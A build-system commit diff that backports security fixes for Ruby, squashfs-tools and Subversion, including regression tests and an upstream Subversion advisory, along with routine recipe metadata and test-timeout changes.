+From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
+Date: Wed, 29 Mar 2023 13:28:25 +0900
+Subject: [PATCH] CVE-2023-28756
+
+CVE: CVE-2023-28756
+Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/time.rb | 6 +++---
+ test/test_time.rb | 9 +++++++++
+ 2 files changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/time.rb b/lib/time.rb
+index f27bacd..4a86e8e 100644
+--- a/lib/time.rb
++++ b/lib/time.rb
+@@ -501,8 +501,8 @@ class Time
+ (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
+ (\d{2,})\s+
+ (\d{2})\s*
+- :\s*(\d{2})\s*
+- (?::\s*(\d{2}))?\s+
++ :\s*(\d{2})
++ (?:\s*:\s*(\d\d))?\s+
+ ([+-]\d{4}|
+ UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
+ # Since RFC 2822 permit comments, the regexp has no right anchor.
+@@ -717,7 +717,7 @@ class Time
+ #
+ # If self is a UTC time, Z is used as TZD. [+-]hh:mm is used otherwise.
+ #
+- # +fractional_digits+ specifies a number of digits to use for fractional
++ # +fraction_digits+ specifies a number of digits to use for fractional
+ # seconds. Its default value is 0.
+ #
+ # require 'time'
+diff --git a/test/test_time.rb b/test/test_time.rb
+index ca20788..4f11048 100644
+--- a/test/test_time.rb
++++ b/test/test_time.rb
+@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
+ assert_equal(true, t.utc?)
+ end
+
++ def test_rfc2822_nonlinear
++ pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
++ assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
++ assert_raise(ArgumentError) do
++ Time.rfc2822(s)
++ end
++ end
++ end
++
+ def test_encode_rfc2822
+ t = Time.utc(1)
+ assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby_2.7.1.bb b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
index f87686f6f7..7e6373bd24 100644
--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,11 +6,17 @@ SRC_URI += " \
file://remove_has_include_macros.patch \
file://run-ptest \
file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
- file://CVE-2020-25613.patch \
+ file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+ file://CVE-2023-28756.patch \
+ file://CVE-2021-33621.patch \
"
-SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909"
-SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418"
+SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
+SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
+
+# CVE-2021-28966 is Windows specific and not affects Linux OS
+# https://security-tracker.debian.org/tracker/CVE-2021-28966
+CVE_CHECK_WHITELIST += "CVE-2021-28966"
PACKAGECONFIG ??= ""
PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
index f84a7e18c8..95dccb9cae 100755
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
else
echo "ERROR: postinst $i failed."
[ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
- remove_pi_dir=0
+ remove_rcsd_link=0
fi
done
}
-remove_pi_dir=1
+remove_rcsd_link=1
if $pm_installed; then
case $pm in
"ipk")
@@ -92,9 +92,7 @@ else
exec_postinst_scriptlets
fi
-# since all postinstalls executed successfully, remove the postinstalls directory
-# and the rcS.d link
-if [ $remove_pi_dir = 1 ]; then
- rm -rf $pi_dir
+# since all postinstalls executed successfully, remove the rcS.d link
+if [ $remove_rcsd_link = 1 ]; then
remove_rcsd_link
fi
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
index 7f72f3388a..b6b81d5c1a 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
[Unit]
Description=Run pending postinsts
DefaultDependencies=no
-After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount
+After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
Before=sysinit.target
[Service]
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
index 85b3fc867e..c353d4b79c 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
SUMMARY = "Runs postinstall scripts on first boot of the target device"
+DESCRIPTION = "${SUMMARY}"
SECTION = "devel"
PR = "r10"
LICENSE = "MIT"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
+Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
+for compatible.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
+CVE: CVE-2021-40153
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sat, 16 Jan 2021 20:08:55 +0000
+Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
+
+An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
+shows how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and ..) can cause Unsquashfs to write
+files outside of the destination directory.
+
+This commit fixes this exploit by checking all names for
+validity.
+
+In doing so I have also added checks for '.' and for names that
+are shorter than they should be (names in the file system should
+not have '\0' terminators).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile | 5 ++-
+ squashfs-tools/unsquash-1.c | 9 +++++-
+ squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-2.c | 9 +++++-
+ squashfs-tools/unsquash-3.c | 9 +++++-
+ squashfs-tools/unsquash-4.c | 9 +++++-
+ squashfs-tools/unsquashfs.h | 5 ++-
+ 7 files changed, 98 insertions(+), 6 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-1234.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index aee4b960..20feaca2 100644
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
+ caches-queues-lists.o
+
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
++ compressor.o unsquashfs_info.o
+
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
+
+ unsquash-34.o: unsquashfs.h unsquash-34.c
+
++unsquash-1234.o: unsquash-1234.c
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 34eced36..28326cb1 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+new file mode 100644
+index 00000000..c2d4f42b
+--- /dev/null
++++ b/squashfs-tools/unsquash-1234.c
+@@ -0,0 +1,58 @@
++/*
++ * Unsquash a squashfs filesystem. This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-1234.c
++ *
++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
++ * unsquash-4.
++ */
++
++#define TRUE 1
++#define FALSE 0
++/*
++ * Check name for validity, name should not
++ * - be ".", "./", or
++ * - be "..", "../" or
++ * - have a "/" anywhere in the name, or
++ * - be shorter than the expected size
++ */
++int check_name(char *name, int size)
++{
++ char *start = name;
++
++ if(name[0] == '.') {
++ if(name[1] == '.')
++ name++;
++ if(name[1] == '/' || name[1] == '\0')
++ return FALSE;
++ }
++
++ while(name[0] != '/' && name[0] != '\0')
++ name ++;
++
++ if(name[0] == '/')
++ return FALSE;
++
++ if((name - start) != size)
++ return FALSE;
++
++ return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 4b3d767e..474064e1 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2019
++ * Copyright (c) 2009, 2010, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 02c31fc5..65cfe4d9 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 8475835c..aa23a841 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 934618b2..db1da7a0 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -4,7 +4,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2014, 2019
++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
+
+ /* unsquash-34.c */
+ extern long long *alloc_index_table(int);
++
++/* unsquash-1234.c */
++extern int check_name(char *, int);
+ #endif
diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index b06951df36..5d754b20b3 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
# Note, we can probably remove the lzma option as it has be replaced with xz,
# and I don't think the kernel supports it any more.
SUMMARY = "Tools for manipulating SquashFS filesystems"
+HOMEPAGE = "https://github.com/plougher/squashfs-tools"
+DESCRIPTION = "Tools to create and extract Squashfs filesystems."
SECTION = "base"
LICENSE = "GPL-2"
LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
PV = "4.4"
SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+ file://CVE-2021-40153.patch;striplevel=2 \
"
S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace/run-ptest b/meta/recipes-devtools/strace/strace/run-ptest
index 4660207220..3a51fb0be9 100755
--- a/meta/recipes-devtools/strace/strace/run-ptest
+++ b/meta/recipes-devtools/strace/strace/run-ptest
@@ -1,5 +1,5 @@
#!/bin/sh
-export TIMEOUT_DURATION=120
+export TIMEOUT_DURATION=240
chown nobody tests
chown nobody tests/*
chown nobody ../ptest
diff --git a/meta/recipes-devtools/strace/strace_5.5.bb b/meta/recipes-devtools/strace/strace_5.5.bb
index ae552da028..4121cfcce7 100644
--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "System call tracing tool"
HOMEPAGE = "http://strace.io"
+DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
SECTION = "console/utils"
LICENSE = "LGPL-2.1+ & GPL-2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
+Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ]
+CVE: CVE-2020-17525
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+ Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
+
+Summary:
+========
+
+ Subversion's mod_authz_svn module will crash if the server is using
+ in-repository authz rules with the AuthzSVNReposRelativeAccessFile
+ option and a client sends a request for a non-existing repository URL.
+
+ This can lead to disruption for users of the service.
+
+Known vulnerable:
+=================
+
+ mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
+ mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
+
+Known fixed:
+============
+
+ mod_dav_svn+mod_authz_svn servers 1.14.1
+ mod_dav_svn+mod_authz_svn servers 1.10.7
+
+Details:
+========
+
+ A null-pointer-dereference has been found in mod_authz_svn that results in
+ a remote unauthenticated Denial-of-Service in some server configurations.
+
+ The vulnerability can be triggered by an unauthenticated user if the
+ Apache HTTPD server is configured to use an in-repository authz file,
+ with configuration directives such as:
+
+ AuthzSVNAccessFile "^/authz"
+ AuthzSVNReposRelativeAccessFile "^/authz"
+
+ The problem originates when sending a GET request to a non-existent
+ repository. The mod_authz_svn module will attempt to find authz rules
+ at a path within the requested SVN repository. Upon constructing this
+ path, the function svn_repos_find_root_path will return a NULL pointer
+ since the requested repository does not exist on-disk.
+ A check for this legitimate NULL pointer condition is missing, which
+ results in a segmentation fault when the NULL pointer is used.
+
+ The in-repository authz feature was first introduced in Subversion 1.8:
+ https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
+
+ The missing NULL check was first introduced during refactoring of the
+ authz code during development work leading up to Subversion 1.9.
+ Subversion 1.8 servers are unaffected.
+
+Severity:
+=========
+
+ CVSSv3 Base Score: 7.5 (High)
+
+ CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+
+ Exploitation results in denial of service by crashing the HTTPD worker
+ handling the request. The impact of this differs depending on how the
+ Apache HTTPD server is configured, including the choice of MPM (Multi-
+ Processing-Module). If the worker shares its memory address space with
+ the main thread, as is the case with e.g. the Event MPM, the entire
+ HTTPD server process will terminate. If the pre-fork MPM is used, the
+ worker will terminate but the HTTPD server will stay up, and service
+ availability will depend on how frequently the attacker is able to
+ send malicious requests which target the vulnerability.
+
+Recommendations:
+================
+
+ We recommend all users to upgrade to a known fixed release of the
+ Subversion mod_dav_svn server.
+
+ Users who are unable to upgrade may apply the included patches.
+
+ As a workaround, the use of in-repository authz rules files with
+ the AuthzSVNReposRelativeAccessFile can be avoided by switching
+ to an alternative configuration which fetches an authz rules file
+ from the server's filesystem, rather than from an SVN repository.
+
+References:
+===========
+
+ CVE-2020-17525 (Subversion)
+
+Reported by:
+============
+
+ Thomas Åkesson, simonsoft.se
+
+Patches:
+========
+
+ Patch for Subversion 1.10, 1.14:
+
+[[[
+Index: subversion/libsvn_repos/config_file.c
+===================================================================
+--- a/subversion/libsvn_repos/config_file.c (revision 1883994)
++++ b/subversion/libsvn_repos/config_file.c (working copy)
+@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
+ {
+ /* Search for a repository in the full path. */
+ repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
++ if (repos_root_dirent == NULL)
++ return svn_error_trace(handle_missing_file(stream, checksum, access,
++ url, must_exist,
++ svn_node_none));
+
+ /* Attempt to open a repository at repos_root_dirent. */
+ SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
+]]]
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
+From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
+From: Nathan Hartman <hartmannathan@apache.org>
+Date: Sun, 27 Mar 2022 05:59:18 +0000
+Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
+ w/testlist variation
+
+git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
+
+CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ subversion/libsvn_repos/log.c | 26 +++++-------
+ subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 16 deletions(-)
+
+diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
+index d9a1fb1085e16..41ca8aed27174 100644
+--- a/subversion/libsvn_repos/log.c
++++ b/subversion/libsvn_repos/log.c
+@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
+ if ( (change->change_kind == svn_fs_path_change_add)
+ || (change->change_kind == svn_fs_path_change_replace))
+ {
+- const char *copyfrom_path = change->copyfrom_path;
+- svn_revnum_t copyfrom_rev = change->copyfrom_rev;
+-
+ /* the following is a potentially expensive operation since on FSFS
+ we will follow the DAG from ROOT to PATH and that requires
+ actually reading the directories along the way. */
+ if (!change->copyfrom_known)
+ {
+- SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
++ SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
+ root, path, iterpool));
+ change->copyfrom_known = TRUE;
+ }
+
+- if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
++ if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
+ {
+- svn_boolean_t readable = TRUE;
+-
+ if (callbacks->authz_read_func)
+ {
+ svn_fs_root_t *copyfrom_root;
++ svn_boolean_t readable;
+
+ SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
+- copyfrom_rev, iterpool));
++ change->copyfrom_rev, iterpool));
+ SVN_ERR(callbacks->authz_read_func(&readable,
+ copyfrom_root,
+- copyfrom_path,
++ change->copyfrom_path,
+ callbacks->authz_read_baton,
+ iterpool));
+ if (! readable)
+- found_unreadable = TRUE;
+- }
+-
+- if (readable)
+- {
+- change->copyfrom_path = copyfrom_path;
+- change->copyfrom_rev = copyfrom_rev;
++ {
++ found_unreadable = TRUE;
++ change->copyfrom_path = NULL;
++ change->copyfrom_rev = SVN_INVALID_REVNUM;
++ }
+ }
+ }
+ }
+diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
+index 760cb3663d02f..92e8a5e1935c9 100755
+--- a/subversion/tests/cmdline/authz_tests.py
++++ b/subversion/tests/cmdline/authz_tests.py
+@@ -1731,6 +1731,60 @@ def empty_group(sbox):
+ '--username', svntest.main.wc_author,
+ sbox.repo_url)
+
++@Skip(svntest.main.is_ra_type_file)
++def log_inaccessible_copyfrom(sbox):
++ "log doesn't leak inaccessible copyfrom paths"
++
++ sbox.build(empty=True)
++ sbox.simple_add_text('secret', 'private')
++ sbox.simple_commit(message='log message for r1')
++ sbox.simple_copy('private', 'public')
++ sbox.simple_commit(message='log message for r2')
++
++ svntest.actions.enable_revprop_changes(sbox.repo_dir)
++ # Remove svn:date and svn:author for predictable output.
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:date', sbox.repo_url)
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:author', sbox.repo_url)
++
++ write_restrictive_svnserve_conf(sbox.repo_dir)
++
++ # First test with blanket access.
++ write_authz_file(sbox,
++ {"/" : "* = rw"})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ " A /public (from /private:1)\n",
++ "\n",
++ "log message for r2\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
++ # Now test with an inaccessible copy source (/private).
++ write_authz_file(sbox,
++ {"/" : "* = rw"},
++ {"/private" : "* ="})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ # The copy is shown as a plain add with no copyfrom info.
++ " A /public\n",
++ "\n",
++ # No log message, as the revision is only partially visible.
++ "\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
+
+ ########################################################################
+ # Run the tests
+@@ -1771,6 +1825,7 @@ def empty_group(sbox):
+ inverted_group_membership,
+ group_member_empty_string,
+ empty_group,
++ log_inaccessible_copyfrom,
+ ]
+ serial_only = True
+
diff --git a/meta/recipes-devtools/subversion/subversion_1.13.0.bb b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
index b3c44ca9b9..5643191569 100644
--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Subversion (svn) version control system client"
HOMEPAGE = "http://subversion.apache.org"
+DESCRIPTION = "Subversion is an open source version control system."
SECTION = "console/network"
LICENSE = "Apache-2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://disable_macos.patch \
file://0001-Fix-libtool-name-in-configure.ac.patch \
file://serfmacro.patch \
+ file://CVE-2020-17525.patch \
+ file://CVE-2021-28544.patch \
"
SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"
diff --git a/meta/recipes-devtools/swig/swig/determinism.patch b/meta/recipes-devtools/swig/swig/determinism.patch
new file mode 100644
index 0000000000..8ffb4bce8e
--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
+Remove the compiler commandline/platform from the compiled binary as this
+breaks reproducibilty.
+
+Upstream-Status: Inappropriate [OE reproducibiity fix upstream unlikely to take]
+RP 2021/3/1
+
+
+Index: swig-3.0.12/Source/Modules/main.cxx
+===================================================================
+--- swig-3.0.12.orig/Source/Modules/main.cxx
++++ swig-3.0.12/Source/Modules/main.cxx
+@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
+ }
+ } else if (strcmp(argv[i], "-version") == 0) {
+ fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
+- fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
+ fprintf(stdout, "\nConfigured options: %cpcre\n",
+ #ifdef HAVE_PCRE
+ '+'
diff --git a/meta/recipes-devtools/swig/swig_3.0.12.bb b/meta/recipes-devtools/swig/swig_3.0.12.bb
index 45026c9700..090aaa8112 100644
--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
+ file://determinism.patch \
"
